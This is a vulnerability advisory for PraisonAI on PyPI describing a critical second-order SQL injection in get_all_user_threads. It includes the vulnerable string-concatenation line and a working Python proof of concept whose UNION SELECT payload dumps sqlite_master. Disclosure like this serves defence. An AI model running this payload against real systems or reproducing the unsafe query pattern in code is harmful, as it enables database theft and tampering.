PT-2026-53547 · Pypi · Praisonai

Published

2026-06-29

·

Updated

2026-06-29

CVSS v3.1

9.8

Critical

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

The get all user threads function constructs raw SQL queries using f-strings with unescaped thread IDs fetched from the database. An attacker stores a malicious thread ID via update thread. When the application loads the thread list, the injected payload executes and grants full database access.

Details

File Path: src/praisonai/praisonai/ui/sql alchemy.py
Flow:
  • Source (Line 539):
python
await data layer.update thread(thread id=payload, user id=user)
  • Hop (Line 547):
python
thread ids = "('" + "','".join([t["thread id"] for t in user threads]) + "')"
  • Sink (Line 576):
sql
WHERE s."threadId" IN {thread ids}

Proof of Concept (PoC)

python

import asyncio
from praisonai.ui.sql alchemy import SQLAlchemyDataLayer

async def run poc():
  data layer = SQLAlchemyDataLayer(conninfo="sqlite+aiosqlite:///app.db")

  # Insert a valid thread
  await data layer.update thread(
    thread id="valid thread", 
    user id="attacker"
  )

  # Inject malicious payload
  payload = "x') UNION SELECT name, null, null, 'valid thread', null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM sqlite master--"

  await data layer.update thread(
    thread id=payload, 
    user id="attacker"
  )

  # Trigger vulnerable function
  result = await data layer.get all user threads(user id="attacker")

  for thread in result:
    if getattr(thread, 'id', '') == 'valid thread':
      for step in getattr(thread, 'steps', []):
        print(getattr(step, 'id', ''))

asyncio.run(run poc())

# Expected Output:
# sqlite master table names printed to console

Impact

An attacker can achieve full database compromise, including:
  • Exfiltration of sensitive data (user emails, session tokens, API keys)
  • Access to all conversation histories
  • Ability to modify or delete database contents

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-470

Affected Products

Praisonai